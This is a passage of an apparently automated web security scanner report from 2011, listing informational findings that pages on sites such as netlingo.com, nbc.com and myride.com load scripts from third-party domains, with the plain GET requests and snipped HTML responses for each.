<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<link href="/ccss/default.css,buddys.css,dropdown.css,users.css,autocompleter.css,spotlight.css,remooz.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="http://static.mister-wong.de/mootools-1.2-core-more.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/" type="text/javascript"></script>
...[SNIP]...

21.1122. http://www.munit.co.uk/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.munit.co.uk
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://s16.sitemeter.com/js/counter.js?site=s16mlogix

Request

GET / HTTP/1.1
Host: www.munit.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:08:15 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 4487

       <html>
       <head>
           <title>mLogix : Web Application Development in Orlando, FL | Welcome</title>

                   <script type="text/javascript">
        var _kmq = _kmq || [];
        function _kms(u){
           setTimeo
...[SNIP]...
<link rel="stylesheet"type="text/css" href="/includes/nav.css" media="screen" />
       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

                   <script type="text/javascript" src="http://s16.sitemeter.com/js/counter.js?site=s16mlogix">
                   </script>
...[SNIP]...

21.1123. http://www.myride.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myride.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=300x250;ptile=1;!cat=;ord=60517426?
http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=27821;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=160x185;!cat=;ord=60517426?
http://an.tacoda.net/an/17295/slf.js
http://js.revsci.net/gateway/gw.js?csid=K04491
http://loadus.exelator.com/load/?p=245&g=003&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no
http://www.bkrtx.com/js/bk-static.js

Request

GET / HTTP/1.1
Host: www.myride.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Tue, 25 Jan 2011 00:08:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 25 Jan 2011 00:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cweb=JONQJVS10.4.128.192CKMMI; path=/
Set-Cookie: USER_UUID_VCH=48FF47EA%2DCE8D%2DEABF%2D0FDF88CEC9C9E345;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2016%3A07%3A26%27%7D;path=/
Set-Cookie: COUNT=1;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D01%2D24%2020%3A08%3A26%27%7D;expires=Thu, 17-Jan-2041 00:08:26 GMT;path=/
Set-Cookie: ID=27821%3BRIDE;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=1;path=/
Content-Length: 42720


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

       <title>New Cars | Used Cars for Sale | New and Used Car Prices | MyRide.com</title>
...[SNIP]...
u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=160x185;!cat=;ord=60517426?" name="frame1" width="160" height="185" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" border="0">
   <script language="JavaScript1.1" src="http://ad.doubleclick.net/adj/abtl.home/mtu;abr=!ie;kw=mtu;info=27821;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=160x185;!cat=;ord=60517426?">
   </script>
...[SNIP]...
C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=300x250;ptile=1;!cat=;ord=60517426?" name="frame1" width="300" height="250" frameborder="no" border="0" MARGINWIDTH="0" MARGINHEIGHT="0" SCROLLING="no">
               <SCRIPT language="JavaScript1.1" SRC="http://ad.doubleclick.net/adj/abtl.home/fms;abr=!ie;kw=fms;u=|||48FF4A1C-FB85-AAE5-26DEBF79B290F165|||27821|||;sz=300x250;ptile=1;!cat=;ord=60517426?">
               </SCRIPT>
...[SNIP]...
</iframe>

       <script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...



       <script src="http://js.revsci.net/gateway/gw.js?csid=K04491"></script>
...[SNIP]...
</script>
       <script src="http://an.tacoda.net/an/17295/slf.js" type="text/javascript"></script>
...[SNIP]...
</script>

<SCRIPT
   TYPE="text/javascript"
   SRC="http://loadus.exelator.com/load/?p=245&g=003&c=285379&ctg=Automotive&cmake=&cmodel=&new=yes&type=&ins=no"></SCRIPT>
...[SNIP]...

21.1124. http://www.myspace.com/netlingo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myspace.com
Path:	/netlingo

Issue detail

The response dynamically includes the following scripts from other domains:

http://cms.myspacecdn.com/cms/js/ad_wrapper0163.js
http://js.myspacecdn.com/modules/common/static/js/atlas/msglobal_hbblzuck.js

Request

GET /netlingo HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.1125. http://www.nbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nbc.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js?pub=nbcunbc2
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://www.nbcudigitaladops.com/hosted/global.js

Request

GET / HTTP/1.1
Host: www.nbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 PHP/5.2.10
Wirt: qw-p-web17.qwplatform.com
Content-Type: text/html
Cache-Control: max-age=40
Expires: Tue, 25 Jan 2011 04:47:46 GMT
Date: Tue, 25 Jan 2011 04:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak-mobile-true=no; expires=Wed, 26-Jan-2011 04:47:06 GMT; path=/
Vary: User-Agent
Content-Length: 131845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pub=nbcunbc2"></script>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...


<script type="text/javascript" src="http://www.nbcudigitaladops.com/hosted/global.js"></script>
...[SNIP]...

21.1126. http://www.netlingo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET / HTTP/1.1
Host: www.netlingo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:02:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 46406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1127. http://www.netlingo.com/acronyms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/acronyms.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /acronyms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:44:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 229925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1128. http://www.netlingo.com/add-edit/editor-guidelines.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/add-edit/editor-guidelines.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /add-edit/editor-guidelines.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:52:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 39414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1129. http://www.netlingo.com/add.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/add.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9
http://api.recaptcha.net/js/recaptcha_ajax.js
http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /add.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
 <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
<div id="recapchadiv">
<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LdTYgcAAAAAAH2RLdFzXenhCGHLWur7ZmaliPy9"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1130. http://www.netlingo.com/advertise/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 38363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1131. http://www.netlingo.com/advertise/licensing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/licensing.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/licensing.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 36949

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1132. http://www.netlingo.com/advertise/payments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/payments.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/payments.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1133. http://www.netlingo.com/advertise/sponsorships.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/sponsorships.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /advertise/sponsorships.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1134. http://www.netlingo.com/archive.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/archive.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /archive.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1135. http://www.netlingo.com/by-category/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/by-category/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /by-category/index.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:49:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 41095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1136. http://www.netlingo.com/category/acronyms.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/acronyms.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/acronyms.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 163340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1137. http://www.netlingo.com/category/business.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/business.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/business.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 83555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1138. http://www.netlingo.com/category/hardware.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/hardware.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/hardware.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1139. http://www.netlingo.com/category/jargon.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/jargon.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/jargon.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 129619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1140. http://www.netlingo.com/category/marketing.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/marketing.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/marketing.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 46870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1141. http://www.netlingo.com/category/net-organization.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/net-organization.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/net-organization.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 50980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1142. http://www.netlingo.com/category/programming.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/programming.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/programming.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 40843

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1143. http://www.netlingo.com/category/software.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/software.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/software.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 45055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1144. http://www.netlingo.com/category/technical.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/technical.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/technical.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 75558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
<script type='text/javascript' src='http://kona.kontera.com/javascript/lib/KonaLibInline.js'>
</script>
...[SNIP]...

21.1145. http://www.netlingo.com/category/technology.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/category/technology.php

Issue detail

The response dynamically includes the following script from another domain:

http://kona.kontera.com/javascript/lib/KonaLibInline.js

Request

GET /category/technology.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:50:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 60392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</script>
